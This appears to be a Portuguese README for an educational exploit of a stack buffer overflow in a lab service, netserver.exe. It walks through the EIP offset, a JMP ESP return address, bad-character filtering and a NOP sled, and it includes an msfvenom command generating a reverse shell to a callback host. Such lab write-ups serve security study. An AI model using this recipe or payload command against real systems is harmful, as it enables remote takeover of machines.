## https://sploitus.com/exploit?id=74AA3D93-5808-53A3-83D5-7F37EB9D1609
🛠️ Configuração do Laboratório (Lab Setup)
Para reproduzir este exploit, utilize o ambiente controlado abaixo:
1. Ambiente Virtual
SO Alvo: Windows 10 Enterprise.
Download: https://www.microsoft.com/pt-br/evalcenter/evaluate-windows-10-enterprise
2. Binários Vulneráveis
Os arquivos necessários estão compactados na pasta /binaries.
Arquivo: binaries.7z
Senha: hunter1
Instrução: Extraia o netserver.exe e a netserver.dll para o Desktop do Windows 10. Ambos devem estar na mesma pasta para o funcionamento correto da exploração.
📌 Descrição
Este repositório contém o código de exploração para uma vulnerabilidade de Stack-based Buffer Overflow identificada no serviço netserver.exe. O exploit demonstra o ciclo completo de desenvolvimento: desde o controle do fluxo de execução (EIP) até a execução de comandos remotos (RCE) via reverse shell.
🛠️ Detalhes Técnicos
1. Fuzzing Inicial e Controle de EIP
O primeiro passo foi testar os limites do comando SEND. Através de testes de estresse com buffers incrementais, identifiquei que o serviço transborda após 2007 bytes.
Vetor: Comando SEND
Offset: 2007 bytes de preenchimento (padding)


2. Redirecionamento de Execução
Para contornar endereços dinâmicos, utilizei o endereço de retorno 0x625012a0 da netserver.dll. Este endereço contém a instrução JMP ESP, que redireciona o ponteiro de execução diretamente para o nosso buffer na pilha.


3. Identificação de Bad Chars e Payload
Analisei a memória para identificar caracteres que corrompiam o payload. O caractere nulo \x00 foi o principal "Bad Char" filtrado. Para a geração do shellcode, utilizei o seguinte comando:
```bash
msfvenom -p windows/shell_reverse_tcp lhost=192.168.18.42 lport=443 exitfunc=thread -b "\x00" -f c
```
4. Alinhamento de Memória (NOP Sled)
Implementei um NOP Sled (32 bytes de \x90) para garantir que o processador tenha uma "área de escape" segura. Isso evita que o processo de autodecodificação do shellcode corrompa o próprio payload durante a execução.

5. Remote Code Execution (RCE)
A etapa final demonstra a execução bem-sucedida do exploit, resultando em uma shell reversa funcional com privilégios totais sobre o sistema alvo.

⚠️ Disclaimer
Este projeto foi desenvolvido estritamente para fins educacionais e de pesquisa em segurança da informação. O uso destas técnicas em sistemas sem autorização prévia é ilegal.